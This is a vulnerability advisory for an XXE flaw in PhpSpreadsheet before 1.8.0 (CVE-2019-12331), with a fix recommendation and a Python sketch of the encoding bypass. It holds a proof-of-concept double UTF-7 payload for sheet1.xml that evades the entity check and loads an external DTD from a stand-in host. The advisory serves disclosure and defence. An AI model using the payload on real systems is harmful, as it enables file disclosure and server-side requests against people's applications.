usd-2019-0046 | PhpSpreadsheet <1.8.0


Advisory ID: usd-2019-0046
CVE Number: CVE-2019-12331
Affected Product: PhpSpreadsheet
Affected Version: <1.8.0
Vulnerability Type: XML External Entity (XXE)
Security Risk: High
Vendor URL: https://phpspreadsheet.readthedocs.io/
Vendor Status: Fixed

Description

The XmlScanner converts sheet1.xml from an .xlsx file to UTF-8 if the XML header declares an encoding other than "UTF-8".
This was introduced as a security measure against CVE-2018-19277, but the fix is not sufficient. By double-encoding the XML payload as UTF-7,
it is possible to bypass the check for the string '<!ENTITY'. Furthermore, although the entity loader is disabled by calling libxml_disable_entity_loader() before
the security check, which relies only on regular expressions, it is enabled again before the XML is parsed with simplexml_load_string().
As a result, the entity loader is enabled while the .xml file is parsed, regardless of the PHP version in use.
Although this example uses Reader\Xlsx.php, all readers that pass the XML returned by XmlScanner::load() directly to simplexml_load_string()
should be vulnerable (xml, ods, html, gnumeric).

Proof of Concept (PoC)

Put the following content into sheet1.xml and repack the .xlsx file:

+-ADwAIQ-DOCTYPE xmlrootname +-AFsAPAAh-ENTITY +-ACU aaa SYSTEM +-ACI-http://127.0.0.1:8080/ext.dtd+-ACIAPgAl-aaa+-ADsAJQ-ccc+-ADsAJQ-ddd+-ADsAXQA+-

When the .xlsx file is loaded, the library tries to load ext.dtd from http://127.0.0.1:8080.
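
The effect of the double encoding can be reproduced outside PHP. The following is a minimal sketch, not the library's code: Python's built-in "utf-7" codec stands in for the scanner's conversion, and naive_scan() is a hypothetical helper that converts once and then string-matches. It assumes, in line with the Fix section, that the parser decodes the data as UTF-7 a second time because the declared encoding is left unchanged.

```python
# Illustration only: Python's "utf-7" codec stands in for the PHP conversion.
# PAYLOAD is the PoC content from this advisory, copied verbatim.
PAYLOAD = (
    b"+-ADwAIQ-DOCTYPE xmlrootname +-AFsAPAAh-ENTITY +-ACU aaa SYSTEM "
    b"+-ACI-http://127.0.0.1:8080/ext.dtd"
    b"+-ACIAPgAl-aaa+-ADsAJQ-ccc+-ADsAJQ-ddd+-ADsAXQA+-"
)


def naive_scan(data: bytes, declared_encoding: str) -> str:
    """Hypothetical stand-in for the scanner: convert once, then string-match."""
    text = data.decode(declared_encoding)
    if "<!ENTITY" in text:
        raise ValueError("entity declaration detected")
    return text


# First pass: "+-" decodes to "+", so the result is still UTF-7 encoded
# and contains no literal "<!ENTITY". The check passes.
once = naive_scan(PAYLOAD, "utf-7")

# Second pass: what a parser would see if it decoded the data as UTF-7 again.
twice = once.encode("ascii").decode("utf-7")

print(once)
print(twice)
```

After the first pass the text still consists of UTF-7 shift sequences such as "+ADwAIQ-", so a string match on '<!ENTITY' finds nothing. Only the second pass yields the DOCTYPE with the external parameter entity.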

Fix

Fix the call to libxml_disable_entity_loader() and, after converting the XML file, set its declared encoding to the correct value.

Timeline

Credits

This security vulnerability was found by Daniel Hoffmann of usd AG.